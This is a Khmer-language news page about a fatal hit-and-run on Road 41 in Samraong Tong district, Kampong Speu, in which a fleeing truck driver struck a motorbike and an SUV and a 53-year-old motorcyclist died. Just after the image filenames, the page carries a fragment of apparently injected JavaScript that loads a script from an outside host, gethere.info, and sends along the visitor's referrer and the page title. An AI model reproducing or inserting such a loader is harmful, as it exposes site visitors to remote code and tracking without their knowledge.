Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

បុរសម្នាក់បានស្លាប់ក្រោយបញ្ជូនដល់មន្ទីរពេទ្យ ក្នុងករណីគ្រោះថ្នាកចរាចរណ៍នៅស្រុកសំរោងទង

កំពង់ស្ពឺ៖ បុរសម្នាក់បានក្រោយបញ្ជូនដល់មន្ទីរពេទ្យ បន្ទាប់ពីជួបឧបទ្ទវហេតុគ្រោះថ្នាក់ចរាចណ៍ កាលពីវេលាម៉ោហ១៥ និង ៥២ននាទីថ្ងៃទី៣ ធ្នូ ២០២៦ លើផ្លូវលេខ41 គីឡូម៉ែត្រលេខ 6-7 ត្រង់ចំណុចភូមិអង្គមេត្រី ឃុំរលាំងគ្រើល ស្រុកសំរោងទង ខេត្តកំពង់ស្ពឺ ។ប្រភពបានអោយដឹងថាមុនពេលកេីតហេតុ មានរថយន្ត01គ្រឿងម៉ាកហ៊្វុយស៊្សូ(FUSU) ពណ៌ក្រហមលាយខៀវ ពាក់ស្លាកលេខភ្នំពេញ 3A-1877 អ្នកបើកបរមិនស្គាល់ ឈ្មោះ (ចុះរត់បាត់) ធ្វើដំណើរមកពីត្បូងទៅជើង មកដល់ចំណុចខាងលើបានឡើងវ៉ាឆ្វេងទៅបុកម៉ូតូ01គ្រឿងម៉ាកហុងដាសេ70 គុបជ្រុង ពណ៌ទឹកប៉ិច ពាក់ស្លាកលេខឆ.8975. ភព1 អ្នកបើកឈ្មោះ សួស សំអុល ភេទប្រុស អាយុ53ឆ្នាំរស់នៅភូមិសំបួរ ឃុំរលាំងគ្រើល ស្រុកសំរោង ទង ខេត្តកំពង់ស្ពឺ ដែលកំពុងធ្វើ ដំណើរបញ្រ្ចាសទិសគ្នា បន្ទាប់មក រថយន្តហ៊្វុយស៊្សូបានជ្រុលទៅបុក រថយន្ត01គ្រឿងទៀតម៉ាកស៊ីអ័រវី ពណ៌ទឹកប្រាក់ ពាក់ស្លាកលេខភ្នំពេញ 2U-2473 អ្នកបើកឈ្មោះ គាំ គីនីន ភេទប្រុស អាយុ33ឆ្នាំរស់នៅភូមិអង្គមេត្រី ឃុំរលាំងគ្រើល ស្រុកសំរោងទង ខេត្តកំពង់ស្ពឺ ដែល កំពុងធ្វើដំណើរមកពីត្បូងទៅជើង បណ្តាលអោយអ្នកបើកបរម៉ូតូរងរបួសធ្ងន់ ពេលបញ្ជូនទៅដល់ពេទ្យបានស្លាប់៕

ចំពោះវត្ថុតាងទាំងបីគ្រឿងយកមករក្សាទុកនៅអធិការរដ្ឋាននគរបាលស្រុកសំរោងទងរងចាំការដោះស្រាយជាក្រោយ ។

img_5187 img_5188 img_5189s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More